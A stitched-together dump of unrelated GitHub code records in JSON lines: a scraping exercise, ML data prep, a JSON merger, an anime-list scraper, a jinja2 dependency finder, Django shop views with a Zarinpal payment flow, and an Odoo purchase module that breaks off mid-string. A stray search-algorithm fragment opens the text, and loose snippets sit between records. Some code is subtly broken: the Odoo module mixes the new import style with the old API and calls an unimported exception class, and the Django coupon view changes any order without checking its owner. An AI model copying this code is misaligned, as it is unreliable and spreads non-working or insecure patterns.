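parent_visits = sum(v for _, v in stats.values())
print(max(stats, key=lambda a: ucb1(*stats[a], parent_visits)))  # 2: the unvisited action wins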
{"seq_id":"12095701263","text":"############################################################\r\n#                                                          #\r\n#                         block 1                          #\r\n#                                                          #\r\n############################################################\r\n\r\n# from urllib.error import HTTPError  # check that the HTTP request completed correctly\r\n# from urllib.request import urlopen  # import the urlopen function from Python's urllib.request module\r\n#\r\n# try:\r\n#     html = urlopen('http://www.pythonscraping.com/pages/page1.html')\r\n# except HTTPError as e:\r\n#     print(e)  # return a null value, abort the program, or fall back to another plan\r\n# else:\r\n#     print(404)\r\n\r\n############################################################\r\n#                                                          #\r\n#                         block 2                          #\r\n#                                                          #\r\n############################################################\r\n\r\n# from urllib.request import urlopen  # import the urlopen function from Python's urllib.request module\r\n# from urllib.error import HTTPError  # check that the HTTP request completed correctly\r\n# from urllib.error import URLError  # check whether the link is reachable at all and decide whether to raise\r\n#\r\n# try:\r\n#     html = urlopen(\"https://pythonscrapingthisurldoesnotexist.com\")\r\n# except HTTPError as e:\r\n#     print(\"The server returned an HTTP error\")\r\n# except URLError as e:\r\n#     print(\"The server could not be found!\")  # the server does not exist\r\n# else:\r\n#     print(html.read())\r\n\r\n\r\n############################################################\r\n#                                                          #\r\n#                         block 3                          #\r\n#                                                          #\r\n############################################################\r\n\r\nfrom urllib.request import urlopen\r\nfrom urllib.error import HTTPError\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ndef getTitle(url):  # define the getTitle handler\r\n    try:\r\n        html = urlopen(url)\r\n    except HTTPError as e:\r\n        return None\r\n    try:\r\n        bsObj = BeautifulSoup(html.read(), \"lxml\")\r\n        title = bsObj.body.h1\r\n    except AttributeError as e:\r\n        return None\r\n    return title\r\n\r\n\r\ntitle = getTitle(\"http://www.pythonscraping.com/pages/page1.html\")\r\nif title is None:\r\n    print(\"Title could not be found\")\r\nelse:\r\n    print(title)","repo_name":"akenoshi/Python","sub_path":"Section-01/1.3-error.py","file_name":"1.3-error.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
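The same layered error handling can be folded into one reusable helper; a minimal sketch (not part of the original exercise) with an explicit timeout:

from urllib.request import urlopen
from urllib.error import HTTPError, URLError

def fetch(url, timeout=10):
    try:
        return urlopen(url, timeout=timeout).read()
    except HTTPError as e:
        print('The server returned an HTTP error:', e.code)
    except URLError as e:
        print('The server could not be reached:', e.reason)
    return None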
{"seq_id":"16067965081","text":"import numpy as np\nfrom sklearn.ensemble import IsolationForest\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport torch\nfrom models import RMSLELoss, Net\ndef clean_data(train_set_panda):\n    \"\"\"\n    Take a pandas dataframe and convert all categorical values to numerical\n    - fill NaN values in numerical columns with that column's mean\n    - drop 4 columns (Alley, PoolQC, Fence, MiscFeature) because of NaN values\n    \"\"\"\n    \n    for clm in train_set_panda.columns:\n        # check if it is a categorical column\n        if train_set_panda[clm].dtype.name == 'object':\n            cat_vals = train_set_panda[clm].unique()\n            numerical_vals = [i for i in range(1,len(cat_vals)+1)]\n            # replace categorical variable with numerical \n            train_set_panda[clm] = train_set_panda[clm].replace(cat_vals,numerical_vals )\n\n        else:\n            train_set_panda[clm] = train_set_panda[clm].fillna(train_set_panda[clm].mean())\n\n\n\n    # removing Alley, PoolQC, Fence, MiscFeature because of the nan values\n    train_set_panda.drop('Alley', inplace=True, axis=1)\n    train_set_panda.drop('PoolQC', inplace=True, axis=1)\n    train_set_panda.drop('Fence', inplace=True, axis=1)\n    train_set_panda.drop('MiscFeature', inplace=True, axis=1)\n    train_set_panda['LotFrontage'] = train_set_panda['LotFrontage'].fillna(train_set_panda['LotFrontage'].mean())\n    train_set_panda['GarageYrBlt'] = train_set_panda['GarageYrBlt'].fillna(train_set_panda['GarageYrBlt'].mean())\n    \n    return train_set_panda\n\n\ndef abnormal(train_set_panda, test_size, contamination):\n    \n    \"\"\"\n    take a pandas dataframe that contains X and y and split them into numpy arrays\n    - do the split based on the test size\n    - apply anomaly detection based on contamination\n    - return X_train, y_train, X_test, y_test\n    \"\"\"\n    \n    \n    X_train = np.array(train_set_panda)[:,0:np.array(train_set_panda).shape[1]-1]\n    Y_train = np.array(train_set_panda)[:,np.array(train_set_panda).shape[1]-1]\n\n    # split the training set into testing and training \n    X_train, X_test, y_train, y_test = train_test_split(X_train,Y_train, test_size = test_size)\n\n    iso = IsolationForest(contamination = contamination)\n    yhat = iso.fit_predict(X_train)\n    mask = yhat != -1\n    X_train, y_train = X_train[mask, :], y_train[mask]\n    \n    return X_train, X_test, y_train, y_test\n\n\ndef visualize_pca(X_train,X_test):\n    \"\"\"\n    project the data into two dimensions and visualize the training and testing\n    sets in a scatter plot (the y values are not used)\n    \"\"\"\n    pca_train = PCA(n_components = 2)\n    pca_train.fit(X_train)\n    plt.scatter(pca_train.transform(X_train)[:,0], pca_train.transform(X_train)[:,1])\n\n    # testing dataset (orange)\n    pca_test = PCA(n_components = 2)\n    pca_test.fit(X_test)\n    plt.scatter(pca_test.transform(X_test)[:,0], pca_test.transform(X_test)[:,1])\n    \n    plt.xlabel(\"X pca\")\n    plt.ylabel(\"Y pca\")\n    plt.legend([\"Training Data\", \"Testing Data\"])\n    \ndef prep_dataloader(X_train,X_test, y_train, y_test, batch_size):\n    # preprocessing for pytorch as a tensor\n    prep_train_set = []\n    for i in range(X_train.shape[0]):\n        prep_train_set.append((X_train[i,:], y_train[i]))\n    prep_test_set = []\n    for i in range(X_test.shape[0]):\n        prep_test_set.append((X_test[i,:], y_test[i]))\n    train_data_loader = torch.utils.data.DataLoader(prep_train_set, batch_size= batch_size, shuffle=False)\n    test_data_loader = torch.utils.data.DataLoader(prep_test_set, batch_size= batch_size, shuffle=False)\n    \n    return train_data_loader, test_data_loader\n","repo_name":"Naiftt/NNvsXGBOOST","sub_path":"data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"}
{"seq_id":"74636648409","text":"import sys, argparse, json, logging\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--file1',help='input match file')\nparser.add_argument('--file2',help='additional match file')\nparser.add_argument('--outfile',help='output file')\nargs = parser.parse_args()\n\ndef concat(filein,fileout,maxm=-1):\n    json_in = {}\n    json_out = {}\n    try:\n        with open(filein,'r') as fin:\n            json_in = json.load(fin)\n    except (IOError, ValueError):\n        logger.info('cannot load pre-existing JSON file=%s',filein)\n    try:\n        with open(fileout,'r') as fin:\n            json_out = json.load(fin)\n    except (IOError, ValueError):\n        logger.info('cannot load pre-existing JSON file=%s',fileout)\n    n = 0\n    for j in json_in:\n        skip = False\n        for ji in json_out:\n            if ji['input']['img'] == j['input']['img']:\n                skip = True\n                break\n        if not skip:\n            json_out.append(j)\n            n = n + 1\n            if maxm != -1 and n > maxm:\n                break\n    with open(args.outfile,'w') as outf:\n        json.dump(json_out,outf)\n\nconcat(args.file1,args.file2) # append the entries of file1 missing from file2 and write the merged list to --outfile\n","repo_name":"jolibrain/recognition","sub_path":"ai/tools/match_concat.py","file_name":"match_concat.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"}
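The duplicate check in concat() rescans json_out for every entry, which is quadratic. A sketch of the same merge keyed on input.img with a set (merge_matches is a hypothetical helper, not part of the repo):

import json

def merge_matches(path_new, path_base, path_out):
    with open(path_base) as fb, open(path_new) as fn:
        base, extra = json.load(fb), json.load(fn)
    seen = {entry['input']['img'] for entry in base}  # O(1) membership tests
    for entry in extra:
        if entry['input']['img'] not in seen:
            seen.add(entry['input']['img'])
            base.append(entry)
    with open(path_out, 'w') as out:
        json.dump(base, out)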
{"seq_id":"18215268419","text":"import os\nimport time\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\n\nANIME_LINK = 'https://myanimelist.net/animelist/'\nMANGA_LINK = 'https://myanimelist.net/mangalist/'\nIN_FILE = f'{os.getcwd()}/data/sampled-username.list'\nOUT_FILE = f'{os.getcwd()}/data/sampled-access.csv'\nUSERS = []\n\ndef soupify(link):\n\tpage = requests.get(link)\n\treturn BeautifulSoup(page.content, 'html.parser')\n\ndef has_access(link):\n\t# 1. check if a badresult marker exists, e.g. ryuu_zake\n\t# 2. check if the data table exists, e.g. MisterJohnMan\n\tsoup = soupify(link)\n\t\n\t# first check\n\tbadresult = soup.find('div', {'class': 'badresult'})\n\tif badresult:\n\t\tprint(f'Bad result on {link}')\n\t\treturn 0\n\n\t# second check\n\tdata_table = soup.find('tr', {'class': 'list-table-data'})\n\tif not data_table:\n\t\tprint(f'Data table does not exist on {link}')\n\t\treturn 0\n\n\treturn 1\n\ndef load_users(PATH = IN_FILE):\n\twith open(PATH, 'r') as f:\n\t\tfor line in f:\n\t\t\tUSERS.append(line.strip())\n\n\treturn USERS\n\nif __name__ == '__main__':\n\t# load data here\n\tusers = load_users()\n\n\t# prep out file\n\twith open(OUT_FILE, 'w') as f:\n\t\theaders = 'username,anime_access,manga_access'\n\t\tf.write(headers)\n\n\t# loop over\n\tfor username in tqdm(users):\n\t\taccess = {'animelist': None, 'mangalist': None}\n\n\t\taccess['animelist'] = has_access(ANIME_LINK + username)\n\t\ttime.sleep(2)\n\n\t\t# if there is no anime-list access, skip the manga check too\n\t\tif not access['animelist']:\n\t\t\tcontinue\n\n\t\taccess['mangalist'] = has_access(MANGA_LINK + username)\n\t\ttime.sleep(2)\n\n\t\t# if there is no manga-list access, skip the dump\n\t\tif not access['mangalist']:\n\t\t\tcontinue\n\t\t\n\t\t# dump\n\t\twith open(OUT_FILE, 'a') as f:\n\t\t\tf.write(f\"\\n{username},{access['animelist']},{access['mangalist']}\")\n","repo_name":"vioxcd/mals-scraper-eda","sub_path":"scraping-scripts/check-list-access.py","file_name":"check-list-access.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
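The script throttles with fixed two-second sleeps; a sketch (not in the repo) of a shared requests.Session with retry and backoff, which also survives transient 429/5xx responses:

import requests
from bs4 import BeautifulSoup
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

session = requests.Session()
retry = Retry(total=3, backoff_factor=2, status_forcelist=[429, 500, 502, 503])
session.mount('https://', HTTPAdapter(max_retries=retry))

def soupify_with_retry(link):
    # retries with exponential backoff happen inside the adapter
    page = session.get(link, timeout=10)
    return BeautifulSoup(page.content, 'html.parser')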
{"seq_id":"33056162432","text":"from os.path import join, exists, abspath\nfrom jinja2 import meta\n\n__version__ = '1.0.0'\n\ndef find_file_in_dirs(filename, dirs, error_on_multiple=False):\n    found = []\n    for d in dirs:\n        fn = join(d, filename)\n        if exists(fn):\n            if error_on_multiple:\n                if fn not in found:\n                    found.append(fn)\n            else:\n                return abspath(fn)\n    if error_on_multiple:\n        if len(found) > 1:\n            raise Exception(\"File '%s' matched several locations: %s\" % (filename, found))\n    if len(found) == 1:\n        return abspath(found[0])\n    return None\n\n# pylint: disable=W0102\ndef find_dependencies(input_file, templatedirs, env, exceptions=[]):\n    \"\"\"\n    Find the jinja2 dependency list. Files listed in 'exceptions' do not\n    generate exceptions if not found.\n    \"\"\"\n\n    total_set = set()\n\n    def find_dependencies_recurse(file_path):\n        new_deps = []\n\n        # Parse the file and extract the list of references\n\n        with open(file_path, \"r\", encoding=\"utf-8\") as f:\n            ast = env.parse(f.read())\n\n        # For each reference, find the absolute path. If no file\n        # is found and the reference was not listed in exceptions,\n        # throw an error.\n\n        for reference in meta.find_referenced_templates(ast):\n            reference_path = find_file_in_dirs(reference, templatedirs)\n            if reference_path is None:\n                if reference in exceptions:\n                    continue\n                raise Exception(\"cannot find file '%s' referenced in \"\n                                \"'%s'\" % (reference, file_path))\n            new_deps.append(reference_path)\n\n        for dep in new_deps:\n            # Make sure we don't have a circular reference\n            if dep not in total_set:\n                total_set.add(dep)\n                find_dependencies_recurse(dep)\n        return\n\n    top_file = find_file_in_dirs(input_file, templatedirs)\n    if top_file is None:\n        raise Exception(\"cannot find file '%s'\" % input_file)\n    total_set.add(top_file)\n    find_dependencies_recurse(top_file)\n\n    sorted_total = []\n    for x in total_set:\n        sorted_total.append(x)\n\n    sorted_total.sort()\n    return sorted_total\n# pylint: enable=W0102\n","repo_name":"turbulenz/turbulenz_tools","sub_path":"turbulenz_tools/utils/dependencies.py","file_name":"dependencies.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"31"}
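A usage sketch for the module above (the directory names and template files are hypothetical): parse with a bare jinja2 Environment and list every template transitively referenced by base.html:

from jinja2 import Environment

env = Environment()
deps = find_dependencies('base.html', ['templates', 'shared/templates'], env,
                         exceptions=['generated.html'])
for path in deps:
    print(path)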
{"seq_id":"10980623629","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views import View\nfrom .cart import Cart\nfrom home.models import Product\nfrom .forms import CardAddForm, CouponApplyForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Order, OrderItem, Coupon\nimport requests\nfrom django.conf import settings\nimport json\nfrom django.http import HttpResponse\nimport datetime\nfrom django.contrib import messages\n\n\nclass CartView(View):\n    def get(self, request):\n        cart = Cart(request)\n        return render(request, \"orders/cart.html\", {\"cart\": cart})\n\n\nclass CardAddView(View):\n    def post(self, request, product_id):\n        cart = Cart(request)\n        product = get_object_or_404(Product, id=product_id)\n        form = CardAddForm(request.POST)\n        if form.is_valid():\n            cart.add(product, form.cleaned_data[\"quantity\"])\n        return redirect(\"orders:cart\")\n\n\nclass CartRemoveView(View):\n    def get(self, request, product_id):\n        cart = Cart(request)\n        product = get_object_or_404(Product, id=product_id)\n        cart.remove(product)\n        return redirect(\"orders:cart\")\n\n\nclass OrderDetailView(LoginRequiredMixin, View):\n    form_class = CouponApplyForm\n\n    def get(self, request, order_id):\n        order = get_object_or_404(Order, id=order_id)\n        return render(\n            request, \"orders/order.html\", {\"order\": order, \"form\": self.form_class}\n        )\n\n\nclass OrderCreateView(LoginRequiredMixin, View):\n    def get(self, request):\n        cart = Cart(request)\n        order = Order.objects.create(user=request.user)\n        for item in cart:\n            OrderItem.objects.create(\n                order=order,\n                product=item[\"product\"],\n                price=item[\"price\"],\n                quantity=item[\"quantity\"],\n            )\n        cart.clear()\n        return redirect(\"orders:order_detail\", order.id)\n\n\nif settings.SANDBOX:\n    sandbox = \"sandbox\"\nelse:\n    sandbox = \"www\"\n\n\nZP_API_REQUEST = f\"https://{sandbox}.zarinpal.com/pg/rest/WebGate/PaymentRequest.json\"\nZP_API_VERIFY = (\n    f\"https://{sandbox}.zarinpal.com/pg/rest/WebGate/PaymentVerification.json\"\n)\nZP_API_STARTPAY = f\"https://{sandbox}.zarinpal.com/pg/StartPay/\"\n\ndescription = \"Enter the transaction description here\"  # Required\n# Optional\n# Important: this needs to be edited for the real server.\nCallbackURL = \"http://127.0.0.1:8080/orders/verify/\"\n# the payable amount is taken from each order (Order.get_total_price) inside the views\n\n\nclass OrderPayView(LoginRequiredMixin, View):\n    def get(self, request, order_id):\n        order = Order.objects.get(id=order_id)\n        request.session[\"orderpay\"] = {\"order_id\": order_id}\n        data = {\n            \"MerchantID\": settings.MERCHANT,\n            \"Amount\": str(order.get_total_price()),\n            \"Description\": description,\n            \"CallbackURL\": CallbackURL,\n        }\n        headers = {\"accept\": \"application/json\", \"content-type\": \"application/json\"}\n\n        req = requests.post(url=ZP_API_REQUEST, data=json.dumps(data), headers=headers)\n\n        resp = req.json()\n        if len(resp[\"errors\"]) == 0:\n            authority = resp[\"data\"][\"authority\"]\n            return redirect(ZP_API_STARTPAY + authority)\n        else:\n            e_code = resp[\"errors\"][\"code\"]\n            e_message = resp[\"errors\"][\"message\"]\n            return HttpResponse(f\"Error code: {e_code}, Error Message: {e_message}\")\n\n\nclass OrderVerifyView(LoginRequiredMixin, View):\n    def get(self, request, authority):\n        order_id = request.session[\"orderpay\"][\"order_id\"]\n        order = Order.objects.get(id=int(order_id))\n        data = {\n            \"MerchantID\": settings.MERCHANT,\n            \"Amount\": str(order.get_total_price()),\n            \"Authority\": authority,\n        }\n        data = json.dumps(data)\n        # set content length by data\n        headers = {\"content-type\": \"application/json\", \"content-length\": str(len(data))}\n        response = requests.post(ZP_API_VERIFY, data=data, headers=headers)\n\n        if response.status_code == 200:\n            result = response.json()\n            if result[\"Status\"] == 100:\n                return HttpResponse(f\"Payment verified, RefID: {result['RefID']}\")\n            return HttpResponse(f\"Payment failed, status code: {result['Status']}\")\n        return HttpResponse(f\"Gateway error: {response.status_code}\")\n\n\nclass CouponApplyView(LoginRequiredMixin, View):\n    form_class = CouponApplyForm\n\n    def post(self, request, order_id):\n        now = datetime.datetime.now()\n        form = self.form_class(request.POST)\n        if form.is_valid():\n            code = form.cleaned_data[\"code\"]\n            try:\n                coupon = Coupon.objects.get(\n                    code__exact=code,\n                    valid_from__lte=now,\n                    valid_to__gte=now,\n                    active=True,\n                )\n            except Coupon.DoesNotExist:\n                messages.error(request, \"this coupon does not exist\", \"danger\")\n                return redirect(\"orders:order_detail\", order_id)\n            order = Order.objects.get(id=order_id)\n            order.discount = coupon.discount\n            order.save()\n        return redirect(\"orders:order_detail\", order_id)\n","repo_name":"pooyajjj/Django_store","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"34709452735","text":"# -*- encoding: utf-8 -*-\n\nfrom odoo import api, fields, models, _\nimport time\nfrom datetime import datetime\nfrom odoo import netsvc\n\n\n\nclass demande_achat(models.Model):\n    _name=\"purchase.exp.achat\"\n    _logger = netsvc.Logger()\n    _description=\"Demande d'achat\"\n    _order = \"name desc\"\n    \n    \n    def _get_montant_achat(self,cr,uid,ids,field,args,context=None) :\n        res={}\n        for achat in self.browse(cr,uid,ids,context) :\n            cpt=0\n            for det in achat.line_det_ids :\n                cpt += det.subtotal\n            res[achat.id] = cpt\n        return res\n    \n    \n    def onchange_quotation_id(self, cr, uid, ids, quotation_id):\n        if not quotation_id:\n            return {}\n        quo = self.pool.get('purchase.order').browse(cr, uid, quotation_id)\n        return {'value': {'pricelist_id': quo.pricelist_id.id,\n                          },\n                \n                }\n    \n    \n    def onchange_sale_id(self, cr, uid, ids, sale_id):\n        if not sale_id:\n            return {}\n        sale = self.pool.get('sale.order').browse(cr, uid, sale_id)\n        return {'value': {'sale_pricelist_id': sale.pricelist_id.id,\n                          },\n                \n                }\n    \n    def _user_mail_get(self, 
cr, uid, ids, context=None):\n results = self.pool.get('res.users').read(cr, uid, [uid],['email'])\n if results:\n return results[0]['email']\n return False \n \n \n def _get_devise(self, cr, uid, ids, field, arg, context=None):\n res={}\n for demande in self.browse(cr,uid,ids) :\n devise = demande .pricelist_id.currency_id.symbol\n res[demande.id] = devise\n return res\n \n \n def _get_amount_untaxed(self, cr, uid, ids, field, arg, context=None):\n res={}\n amount_untaxed = 0.00\n \n for achat in self.browse(cr, uid, ids) :\n for line in achat.line_det_ids :\n amount_untaxed += line.subtotal\n \n res[achat.id] = amount_untaxed\n \n return res\n \n \n def _get_amount_tax(self, cr, uid, ids, field, arg, context=None):\n res={}\n amount_tax = 0.00\n \n for achat in self.browse(cr, uid, ids) :\n for line in achat.line_det_ids :\n if line.taxe_id :\n amount_tax += line.subtotal * line.taxe_id.amount\n \n res[achat.id] = amount_tax\n \n return res\n \n \n def _get_amount_total(self, cr, uid, ids, field, arg, context=None):\n res={}\n \n for achat in self.browse(cr, uid, ids) :\n amount_untaxed = 0.00\n amount_tax = 0.00\n for line in achat.line_det_ids :\n amount_untaxed += line.subtotal\n if line.taxe_id :\n amount_tax += line.subtotal * line.taxe_id.amount\n \n res[achat.id] = amount_untaxed + amount_tax\n \n return res\n \n \n \n _columns={\n 'name':fields.char('Référence',128,required=True,states={'done':[('readonly',True)]}),\n 'date':fields.date('Date', help='Date',states={'done':[('readonly',True)]}),\n 'date_prevue':fields.datetime('Date', help='Date prévue',states={'done':[('readonly',True)]}),\n 'demandeur_id':fields.many2one('hr.employee', 'Demandeur', required=False, readonly=True, help='Employé en charge de la demande selectionné automatiquement'),\n 'user_id':fields.many2one('res.users', 'Validateur', required=True),\n 'pricelist_id':fields.many2one('product.pricelist', \"Liste de prix d'achat\", required=True,states={'done':[('readonly',True)]}),\n 'location_id':fields.many2one('stock.location', 'Emplacement source', required=True,states={'done':[('readonly',True)]}),\n 'location_dest_id':fields.many2one('stock.location', 'Emplacement destination', required=True,states={'done':[('readonly',True)]}),\n 'notes': fields.text('Commentaires',states={'done':[('readonly',True)]}),\n 'projet': fields.char('Projet'),\n 'line_det_ids':fields.one2many('purchase.exp.achat.detail', 'demande_id', 'Détail demande', required=False,states={'done':[('readonly',True)]}),\n 'bon_sortie_ids':fields.one2many('purchase.exp.sortie', 'achat_id', 'Bon de sortie',states={'done':[('readonly',True)]}),\n 'commentaire_ids':fields.one2many('purchase.exp.commentaire','order_id', required=False),\n 'demande_id':fields.many2one('purchase.exp.besoin', 'Référence du Besoin', required=False, ondelete=\"cascade\", readonly=True),\n 'quotation_id':fields.many2one('purchase.order', 'Devis Fournisseur', required=False, states={'done':[('readonly',True)]}),\n 'sale_id':fields.many2one('sale.order', 'Devis Client', required=False, states={'done':[('readonly',True)]}),\n 'alerte_mail':fields.boolean(\"Envoi de mail\", help=\"Si coché, permet d'envoyer automatiquement un e-mail d'alerte au responsable après la confirmation de la demande d'achat pour validation\",states={'done':[('readonly',True)]}),\n 'mail_user':fields.function(_user_mail_get, method=True, type='char', string='Mail user'), \n 'notes_finance': fields.text('Commentaires finance',states={'done':[('readonly',True)]}),\n 'devise':fields.function(_get_devise, 
method=True, type='char', string='Devise'), \n 'currency_id': fields.related('pricelist_id', 'currency_id', type=\"many2one\", relation=\"res.currency\", string=\"Currency\", readonly=True, required=True),\n 'dg':fields.boolean('DG'),\n 'finance':fields.boolean('Finance'),\n 'amount_untaxed': fields.function(_get_amount_untaxed, method=True, type='float', string='Montant hors-taxe'),\n 'amount_tax': fields.function(_get_amount_tax, method=True, type='float', string='Taxe'),\n 'amount_total': fields.function(_get_amount_total, method=True, type='float', string='Total'),\n 'type_demande':fields.selection([\n ('general','Général'),\n ('achat','Général direct'),\n ('technique','Technique'),\n ('divers','Dépenses diverses'),\n ], 'Type de demande', select=True, readonly=True,states={'done':[('readonly',True)]}),\n 'mtt_achat':fields.function(_get_montant_achat,\n method=True,\n type='float',\n string='Montant', help='Montant évalué du besoin'),\n 'state':fields.selection([('draft','Brouillon'),\n ('draft_tech','Brouillon'),\n ('service','Service'),\n ('departement','Département'),\n ('finance','Finance'),\n ('finance_ach','Finance'),\n ('finance_cai','Finance'),\n ('direction','Direction'),\n ('achat','Achat'),\n ('caisse','Caisse'),\n ('commande','Commande'),\n ('bon','BS émis'),\n ('done','Terminé')],'Statut',readonly=True,required=True,states={'done':[('readonly',True)]}\n ),\n 'message_ids':fields.one2many('mail.message','res_id','Message',required=False),\n }\n \n _sql_constraints = [\n ('name_uniq', 'unique(demande_id)', \"La reférence de l'expression de besoin doit être unique\"),\n ]\n\n def _user_get(self, cr, uid, context=None):\n ids = self.pool.get('res.users').search(cr, uid, [('id', '=', uid)], context=context)\n if ids:\n return ids[0]\n return False\n \n def _get_notification(self, cr, uid, ids, model, name, body, subject, object_id, user_id, demande, context=None):\n besoin_obj = self.pool.get('purchase.exp.besoin')\n besoin_obj._get_notification(cr, uid, ids, model, demande.name, body, subject, object_id, user_id, context)\n return True\n \n def notif_mail(self, cr, uid, ids, user_from, user_to, subject, mail, demande):\n url1 = \"http://erp:8069/?db=TALENTYS#id=\"\n url2 = \"&view_type=form&model=purchase.exp.achat&menu_id=614&action=780\"\n url = url1 + str(demande.id) + url2\n if demande.alerte_mail :\n if not demande.demandeur_id.work_email :\n raise osv.except_osv('Warning',\"Veuiller renseigner l'adresse mail du demandeur\")\n if not demande.demandeur_id.parent_id.work_email :\n raise osv.except_osv('Warning',\"Veuiller renseigner l'adresse mail du responsable du demandeur\")\n \n mail = mail + \"\\n\\n\" + url\n ir_mail_server = self.pool.get('ir.mail_server')\n msg = ir_mail_server.build_email(user_from, [user_to], subject, mail)\n ir_mail_server.send_email(cr, uid, msg)\n \n return True\n \n \n def action_draft(self,cr,uid,ids,context=None):\n \n for achat in self.browse(cr, uid, ids) :\n if achat.alerte_mail :\n user = self.pool.get('res.users').read(cr, uid, [uid],['name'])[0]['name']\n message = \"\"\"Bonjour M/Mme\\n\\n Votre demande d'achat a été mise en brouillon. 
\\n\\nCordialement !\\n\\n\"\"\"\n titre = 'Demande d\\'achat %s : Mise en brouillon par %s' % (achat.name, user)\n emetteur = 'openerp@talentys.ci'\n self.notif_mail(cr, uid, ids, emetteur, achat.demandeur_id.work_email, titre, message, achat)\n \n results = self.pool.get('res.users').read(cr, uid, [uid],['technicien'])\n technicien = False\n if results:\n technicien = results[0]['technicien']\n \n if technicien :\n return self.write(cr,uid,ids,{'state':'draft_tech'})\n else :\n return self.write(cr,uid,ids,{'state':'draft'})\n \n \n \n def button_dummy(self, cr, uid, ids, context=None):\n return True \n\n\n def action_service(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Demande d'achat transmise au Chef de Service Support pour validation
    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n \n message = \"\"\"Bonjour M/Mme\\n\\nJe vous prie de bien vouloir valider ma demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n self.notif_mail(cr, uid, ids, demande.demandeur_id.work_email, demande.demandeur_id.parent_id.work_email, 'Expression de besoin : Validée par le Chef de Service', message, demande)\n \n return self.write(cr,uid,ids,{'state':'service'})\n \n def action_departement(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n \n if demande.demandeur_id.user_id.id == uid and demande.demandeur_id.user_id.technicien == True and demande.demandeur_id.manager == False:\n raise osv.except_osv('Warning', _('Vous n\\'êtes pas autorisé à valider cette demande, Veuillez vous référer à votre chef de service '))\n \n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Demande d'achat transmise au Chef du Département pour validation
    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nJe vous prie de bien vouloir valider la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n self.notif_mail(cr, uid, ids, demande.demandeur_id.work_email, demande.demandeur_id.parent_id.work_email, \"Demande d'achat : En attente de validation\", message, demande)\n return self.write(cr,uid,ids,{'state':'departement'})\n \n \n def action_finance(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Demande d'achat transmise au Responsable des Finances pour validation
    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nJe vous prie de bien vouloir valider la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_dep_finance', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : En attente de validation\", message, demande)\n \n if demande.state == 'direction' : \n self.write(cr, uid, ids, {'dg' : True})\n if demande.type_demande in ('general', 'technique', 'achat') :\n self.write(cr, uid, ids, {'state' : 'finance_ach'})\n else : \n self.write(cr,uid,ids,{'state':'finance_cai'})\n else :\n return self.write(cr,uid,ids,{'state':'finance'})\n \n \n \n def action_direction(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Demande d'achat transmise au Directeur Général pour validation
    \", \"Demande d'achat\", demande.id, demande.user_id.id,demande, context)\n message = \"\"\"Bonjour M/Mme\\n\\nMerci de bien vouloir prendre en compte la demande d'achat ci-dessous.\\nCordialement \\n\\n\"\"\"\n emetteur = self._user_mail_get(cr,uid,ids,context)\n destinataire = besoin_obj._company_param_get(cr, uid, ids, 'mail_direction_gle', context)\n self.notif_mail(cr, uid, ids, emetteur, destinataire, \"Demande d'achat : En attente de validation\", message, demande)\n return self.write(cr,uid,ids,{'state':'direction',\n 'finance': True})\n \n def action_achat(self,cr,uid,ids,context=None):\n for demande in self.browse(cr,uid,ids):\n if demande.type_demande == 'divers' :\n raise osv.except_osv(_('Warning'),_('Les demandes de type Dépense diverses doivent être transmises à la caisse'))\n \n if not demande.dg :\n raise osv.except_osv(_('Warning'),_('La demande doit être d\\'abord validée par la Direction Générale !'))\n \n besoin_obj = self.pool.get('purchase.exp.besoin')\n self._get_notification(cr, uid, ids, 'purchase.exp.achat', demande.name,\"
    Demande d'achat transmise au responsable des achats pour émission du Bon de Commande
